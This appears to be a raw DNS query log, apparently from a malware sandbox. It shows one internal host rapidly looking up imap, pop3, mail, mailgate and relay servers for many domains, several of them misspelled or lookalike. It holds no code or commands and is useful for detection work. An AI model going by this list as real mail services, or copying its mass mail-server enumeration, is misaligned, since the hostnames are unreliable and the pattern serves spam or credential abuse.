Feb 21, 2024 00:26:13.250961065 CET	192.168.2.6	1.1.1.1	0x3fa3	Standard query (0)	imap.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.299017906 CET	192.168.2.6	1.1.1.1	0x1179	Standard query (0)	pop3.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.307478905 CET	192.168.2.6	1.1.1.1	0xb	Standard query (0)	imap.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.451550961 CET	192.168.2.6	1.1.1.1	0x50aa	Standard query (0)	imap.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.516994953 CET	192.168.2.6	1.1.1.1	0x40e2	Standard query (0)	imap.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.685525894 CET	192.168.2.6	1.1.1.1	0xcde2	Standard query (0)	imap.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.689709902 CET	192.168.2.6	1.1.1.1	0xb2ba	Standard query (0)	imap.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.690193892 CET	192.168.2.6	1.1.1.1	0xfd00	Standard query (0)	imap.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.800704956 CET	192.168.2.6	1.1.1.1	0x53d8	Standard query (0)	imap.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.801764011 CET	192.168.2.6	1.1.1.1	0x22	Standard query (0)	pop3.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.801764011 CET	192.168.2.6	1.1.1.1	0x994	Standard query (0)	fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.801991940 CET	192.168.2.6	1.1.1.1	0xd725	Standard query (0)	imap.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.802894115 CET	192.168.2.6	1.1.1.1	0x353b	Standard query (0)	hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.802894115 CET	192.168.2.6	1.1.1.1	0x92d3	Standard query (0)	imap.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.811594963 CET	192.168.2.6	1.1.1.1	0x4d15	Standard query (0)	imap.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.812923908 CET	192.168.2.6	1.1.1.1	0x6fee	Standard query (0)	gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.813750029 CET	192.168.2.6	1.1.1.1	0x5c79	Standard query (0)	imap.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.813796997 CET	192.168.2.6	1.1.1.1	0x7423	Standard query (0)	ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.933461905 CET	192.168.2.6	1.1.1.1	0x348e	Standard query (0)	mail.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.934425116 CET	192.168.2.6	1.1.1.1	0x19de	Standard query (0)	imap.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.934920073 CET	192.168.2.6	1.1.1.1	0xc1bb	Standard query (0)	att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.935508013 CET	192.168.2.6	1.1.1.1	0xff62	Standard query (0)	mail.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.935880899 CET	192.168.2.6	1.1.1.1	0xd93c	Standard query (0)	hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.936271906 CET	192.168.2.6	1.1.1.1	0x8b1f	Standard query (0)	outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.937257051 CET	192.168.2.6	1.1.1.1	0xb43c	Standard query (0)	mail.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.937402964 CET	192.168.2.6	1.1.1.1	0x4c83	Standard query (0)	mail.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.939145088 CET	192.168.2.6	1.1.1.1	0xe2bd	Standard query (0)	cdgcapitalbourse-ma.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.939870119 CET	192.168.2.6	1.1.1.1	0x23b9	Standard query (0)	mail.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.940068960 CET	192.168.2.6	1.1.1.1	0x6cd3	Standard query (0)	mail.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.942032099 CET	192.168.2.6	1.1.1.1	0xdcd6	Standard query (0)	mail.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.942384958 CET	192.168.2.6	1.1.1.1	0x785f	Standard query (0)	mail.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:14.942702055 CET	192.168.2.6	1.1.1.1	0xeab7	Standard query (0)	pop3.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.034673929 CET	192.168.2.6	1.1.1.1	0xb86d	Standard query (0)	ww12.imailzone.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.035255909 CET	192.168.2.6	1.1.1.1	0x5d50	Standard query (0)	imap.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.035437107 CET	192.168.2.6	1.1.1.1	0x3919	Standard query (0)	mail.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.036468983 CET	192.168.2.6	1.1.1.1	0xa7ff	Standard query (0)	pop3.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.039307117 CET	192.168.2.6	1.1.1.1	0x8240	Standard query (0)	spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.087827921 CET	192.168.2.6	1.1.1.1	0xa362	Standard query (0)	mail.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.088121891 CET	192.168.2.6	1.1.1.1	0xfade	Standard query (0)	alt4.aspmx.l.google.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.096225023 CET	192.168.2.6	1.1.1.1	0x4244	Standard query (0)	pop3.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.096594095 CET	192.168.2.6	1.1.1.1	0xcd4e	Standard query (0)	mail.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.227123022 CET	192.168.2.6	1.1.1.1	0xb597	Standard query (0)	mail.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.227298021 CET	192.168.2.6	1.1.1.1	0x88ba	Standard query (0)	pop3.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.228945971 CET	192.168.2.6	1.1.1.1	0xf7fe	Standard query (0)	pop3.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.229182005 CET	192.168.2.6	1.1.1.1	0x109e	Standard query (0)	pop3.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.229490995 CET	192.168.2.6	1.1.1.1	0xbbe4	Standard query (0)	imap.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.230077028 CET	192.168.2.6	1.1.1.1	0x10c0	Standard query (0)	kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.296050072 CET	192.168.2.6	1.1.1.1	0xc73a	Standard query (0)	mail.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.296267033 CET	192.168.2.6	1.1.1.1	0x674d	Standard query (0)	imap.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.297660112 CET	192.168.2.6	1.1.1.1	0x1e43	Standard query (0)	mail.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.297883034 CET	192.168.2.6	1.1.1.1	0x6f93	Standard query (0)	esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.298104048 CET	192.168.2.6	1.1.1.1	0x267e	Standard query (0)	mail.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.299916029 CET	192.168.2.6	1.1.1.1	0x28b5	Standard query (0)	mail.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.300239086 CET	192.168.2.6	1.1.1.1	0x8a17	Standard query (0)	imap.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.301942110 CET	192.168.2.6	1.1.1.1	0xf7f4	Standard query (0)	pop3.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.302108049 CET	192.168.2.6	1.1.1.1	0xddd5	Standard query (0)	pop3.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.302304029 CET	192.168.2.6	1.1.1.1	0x939	Standard query (0)	pop3.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.302563906 CET	192.168.2.6	1.1.1.1	0x7dcc	Standard query (0)	mail.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.302709103 CET	192.168.2.6	1.1.1.1	0xc3be	Standard query (0)	mail.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.302901030 CET	192.168.2.6	1.1.1.1	0x5c0d	Standard query (0)	mail.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.303103924 CET	192.168.2.6	1.1.1.1	0x2b05	Standard query (0)	imap.sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.304442883 CET	192.168.2.6	1.1.1.1	0xcb14	Standard query (0)	pop3.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.304698944 CET	192.168.2.6	1.1.1.1	0xcef7	Standard query (0)	imap.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.304852009 CET	192.168.2.6	1.1.1.1	0x35e3	Standard query (0)	pop3.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.305438995 CET	192.168.2.6	1.1.1.1	0x3855	Standard query (0)	pop3.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.333754063 CET	192.168.2.6	1.1.1.1	0xe641	Standard query (0)	mail.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.334443092 CET	192.168.2.6	1.1.1.1	0xa7db	Standard query (0)	mail.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.334629059 CET	192.168.2.6	1.1.1.1	0xd678	Standard query (0)	imap.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.335603952 CET	192.168.2.6	1.1.1.1	0x1ffc	Standard query (0)	pop3.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.336018085 CET	192.168.2.6	1.1.1.1	0x5a91	Standard query (0)	mail.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.336195946 CET	192.168.2.6	1.1.1.1	0x9f43	Standard query (0)	imap.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.338301897 CET	192.168.2.6	1.1.1.1	0x49d8	Standard query (0)	imap.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.338550091 CET	192.168.2.6	1.1.1.1	0xdbf7	Standard query (0)	mail.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.339865923 CET	192.168.2.6	1.1.1.1	0x4a27	Standard query (0)	imap.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.340044022 CET	192.168.2.6	1.1.1.1	0xda1d	Standard query (0)	mail.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.435884953 CET	192.168.2.6	1.1.1.1	0x868f	Standard query (0)	mail.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.436299086 CET	192.168.2.6	1.1.1.1	0x5ad2	Standard query (0)	pop3.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.438163042 CET	192.168.2.6	1.1.1.1	0x21a	Standard query (0)	imap.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.438163042 CET	192.168.2.6	1.1.1.1	0x9115	Standard query (0)	pop3.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.487341881 CET	192.168.2.6	1.1.1.1	0xe59b	Standard query (0)	imap.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.487341881 CET	192.168.2.6	1.1.1.1	0xd978	Standard query (0)	mail.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.562371016 CET	192.168.2.6	1.1.1.1	0xe936	Standard query (0)	pop3.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.564980984 CET	192.168.2.6	1.1.1.1	0x30db	Standard query (0)	pop3.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.564980984 CET	192.168.2.6	1.1.1.1	0x121e	Standard query (0)	imap.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.626924038 CET	192.168.2.6	1.1.1.1	0x3c6d	Standard query (0)	pop3.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.627039909 CET	192.168.2.6	1.1.1.1	0x1b85	Standard query (0)	imap.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.663695097 CET	192.168.2.6	1.1.1.1	0x1847	Standard query (0)	pop3.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.664299011 CET	192.168.2.6	1.1.1.1	0x788a	Standard query (0)	pop3.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.664299011 CET	192.168.2.6	1.1.1.1	0x9049	Standard query (0)	pop3.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.664583921 CET	192.168.2.6	1.1.1.1	0x75a4	Standard query (0)	pop3.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.664583921 CET	192.168.2.6	1.1.1.1	0x6451	Standard query (0)	pop3.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.666640043 CET	192.168.2.6	1.1.1.1	0xe857	Standard query (0)	pop3.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.666775942 CET	192.168.2.6	1.1.1.1	0x344f	Standard query (0)	imap.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.670386076 CET	192.168.2.6	1.1.1.1	0xd9e7	Standard query (0)	imap.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.702219009 CET	192.168.2.6	1.1.1.1	0xc0b9	Standard query (0)	imap.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.702219963 CET	192.168.2.6	1.1.1.1	0xbfcd	Standard query (0)	imap.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.703028917 CET	192.168.2.6	1.1.1.1	0x7505	Standard query (0)	pop3.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.703028917 CET	192.168.2.6	1.1.1.1	0x8cfd	Standard query (0)	mail.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.703030109 CET	192.168.2.6	1.1.1.1	0xdd26	Standard query (0)	imap.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.704962015 CET	192.168.2.6	1.1.1.1	0x21a9	Standard query (0)	imap.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.742238045 CET	192.168.2.6	1.1.1.1	0x53fc	Standard query (0)	imap.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.772902966 CET	192.168.2.6	1.1.1.1	0x335e	Standard query (0)	pop.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.774576902 CET	192.168.2.6	1.1.1.1	0x26ee	Standard query (0)	mail.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.774576902 CET	192.168.2.6	1.1.1.1	0x536c	Standard query (0)	imap.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.777925014 CET	192.168.2.6	1.1.1.1	0xfeaa	Standard query (0)	mail.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.777925014 CET	192.168.2.6	1.1.1.1	0xbd58	Standard query (0)	imap.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.777925014 CET	192.168.2.6	1.1.1.1	0xe9cf	Standard query (0)	imap.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.847332954 CET	192.168.2.6	1.1.1.1	0xc8a9	Standard query (0)	mail.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.848057032 CET	192.168.2.6	1.1.1.1	0x3ad0	Standard query (0)	mailgate.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.848633051 CET	192.168.2.6	1.1.1.1	0xc528	Standard query (0)	mail.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.862371922 CET	192.168.2.6	1.1.1.1	0x2ce7	Standard query (0)	mail.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.873858929 CET	192.168.2.6	1.1.1.1	0x7cd2	Standard query (0)	mail.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.904325008 CET	192.168.2.6	1.1.1.1	0x6409	Standard query (0)	mail.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.905327082 CET	192.168.2.6	1.1.1.1	0xfce8	Standard query (0)	mail.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.905327082 CET	192.168.2.6	1.1.1.1	0x6519	Standard query (0)	mail.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.905327082 CET	192.168.2.6	1.1.1.1	0x235d	Standard query (0)	mail.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.905770063 CET	192.168.2.6	1.1.1.1	0x3acf	Standard query (0)	pop3.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.905771017 CET	192.168.2.6	1.1.1.1	0x42f0	Standard query (0)	pop3.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.907336950 CET	192.168.2.6	1.1.1.1	0x6bc3	Standard query (0)	pop3.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.907336950 CET	192.168.2.6	1.1.1.1	0x9b65	Standard query (0)	mail.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.909790993 CET	192.168.2.6	1.1.1.1	0x8e46	Standard query (0)	pop3.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.910367966 CET	192.168.2.6	1.1.1.1	0x6ba1	Standard query (0)	mail.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.934524059 CET	192.168.2.6	1.1.1.1	0x7b39	Standard query (0)	mail.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.936594009 CET	192.168.2.6	1.1.1.1	0x285b	Standard query (0)	mailgate.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.936594963 CET	192.168.2.6	1.1.1.1	0xc1f0	Standard query (0)	mail.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.936594963 CET	192.168.2.6	1.1.1.1	0x55a0	Standard query (0)	imap.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.937206030 CET	192.168.2.6	1.1.1.1	0x6128	Standard query (0)	pop3.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:15.940321922 CET	192.168.2.6	1.1.1.1	0x78e0	Standard query (0)	pop3.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.039349079 CET	192.168.2.6	1.1.1.1	0x698f	Standard query (0)	mail.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.135359049 CET	192.168.2.6	1.1.1.1	0x30a8	Standard query (0)	imap.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.156147957 CET	192.168.2.6	1.1.1.1	0x998a	Standard query (0)	pop3.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.159271955 CET	192.168.2.6	1.1.1.1	0x7036	Standard query (0)	mailgate.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.238050938 CET	192.168.2.6	1.1.1.1	0x6721	Standard query (0)	mailgate.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.238050938 CET	192.168.2.6	1.1.1.1	0x9123	Standard query (0)	mailgate.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.240024090 CET	192.168.2.6	1.1.1.1	0x36bd	Standard query (0)	mailgate.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.271337032 CET	192.168.2.6	1.1.1.1	0xe0d3	Standard query (0)	pop3.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.274302006 CET	192.168.2.6	1.1.1.1	0x7b2a	Standard query (0)	pop3.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.275068998 CET	192.168.2.6	1.1.1.1	0x5b39	Standard query (0)	pop3.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.282027960 CET	192.168.2.6	1.1.1.1	0xd414	Standard query (0)	mailgate.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.304307938 CET	192.168.2.6	1.1.1.1	0xa0d5	Standard query (0)	mailgate.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.358064890 CET	192.168.2.6	1.1.1.1	0x236e	Standard query (0)	mailgate.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.362185001 CET	192.168.2.6	1.1.1.1	0x8020	Standard query (0)	relay.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.364305019 CET	192.168.2.6	1.1.1.1	0x313	Standard query (0)	mailgate.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.364839077 CET	192.168.2.6	1.1.1.1	0xd0ad	Standard query (0)	mailgate.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.412646055 CET	192.168.2.6	1.1.1.1	0x9c70	Standard query (0)	www.creativ-moebelwerkstaetten.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.413645029 CET	192.168.2.6	1.1.1.1	0x14bd	Standard query (0)	mailgate.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.419028044 CET	192.168.2.6	1.1.1.1	0x6429	Standard query (0)	mailgate.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.423333883 CET	192.168.2.6	1.1.1.1	0xf2da	Standard query (0)	mailgate.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.429827929 CET	192.168.2.6	1.1.1.1	0x373b	Standard query (0)	mailgate.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.429997921 CET	192.168.2.6	1.1.1.1	0xf01b	Standard query (0)	mailgate.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.445658922 CET	192.168.2.6	1.1.1.1	0x895d	Standard query (0)	mailgate.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.451220036 CET	192.168.2.6	1.1.1.1	0x6240	Standard query (0)	mailgate.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.453561068 CET	192.168.2.6	1.1.1.1	0x2420	Standard query (0)	mailgate.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.459168911 CET	192.168.2.6	1.1.1.1	0x1e43	Standard query (0)	mail.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.515625000 CET	192.168.2.6	1.1.1.1	0xaf6f	Standard query (0)	imap.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.519315958 CET	192.168.2.6	1.1.1.1	0xe96e	Standard query (0)	mailgate.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.611386061 CET	192.168.2.6	1.1.1.1	0x31ac	Standard query (0)	mailgate.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.612575054 CET	192.168.2.6	1.1.1.1	0xc1cd	Standard query (0)	mailgate.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.656191111 CET	192.168.2.6	1.1.1.1	0xb86a	Standard query (0)	mailgate.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.656405926 CET	192.168.2.6	1.1.1.1	0x881a	Standard query (0)	mailgate.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.656743050 CET	192.168.2.6	1.1.1.1	0x70	Standard query (0)	mailgate.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.660192013 CET	192.168.2.6	1.1.1.1	0x32d9	Standard query (0)	mailgate.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.719561100 CET	192.168.2.6	1.1.1.1	0x50b	Standard query (0)	mailgate.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.885885000 CET	192.168.2.6	1.1.1.1	0xb15f	Standard query (0)	mailgate.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.891686916 CET	192.168.2.6	1.1.1.1	0x439	Standard query (0)	mail.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.974605083 CET	192.168.2.6	1.1.1.1	0xd849	Standard query (0)	mailgate.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.978089094 CET	192.168.2.6	1.1.1.1	0x456c	Standard query (0)	mailgate.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.979341984 CET	192.168.2.6	1.1.1.1	0xf55c	Standard query (0)	mailgate.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.979604959 CET	192.168.2.6	1.1.1.1	0xb3b0	Standard query (0)	mail.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.980298042 CET	192.168.2.6	1.1.1.1	0xb3df	Standard query (0)	relay.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.980707884 CET	192.168.2.6	1.1.1.1	0x26d3	Standard query (0)	mailgate.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.984283924 CET	192.168.2.6	1.1.1.1	0xeb73	Standard query (0)	mailgate.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:16.985037088 CET	192.168.2.6	1.1.1.1	0xcbe5	Standard query (0)	mailgate.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.001035929 CET	192.168.2.6	1.1.1.1	0xdf96	Standard query (0)	mailgate.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.252311945 CET	192.168.2.6	1.1.1.1	0x4397	Standard query (0)	mailgate.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.252311945 CET	192.168.2.6	1.1.1.1	0xd41e	Standard query (0)	mailgate.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.258049011 CET	192.168.2.6	1.1.1.1	0x53c0	Standard query (0)	mailgate.sq-community.com	A (IP address)	IN (0x0001)	false
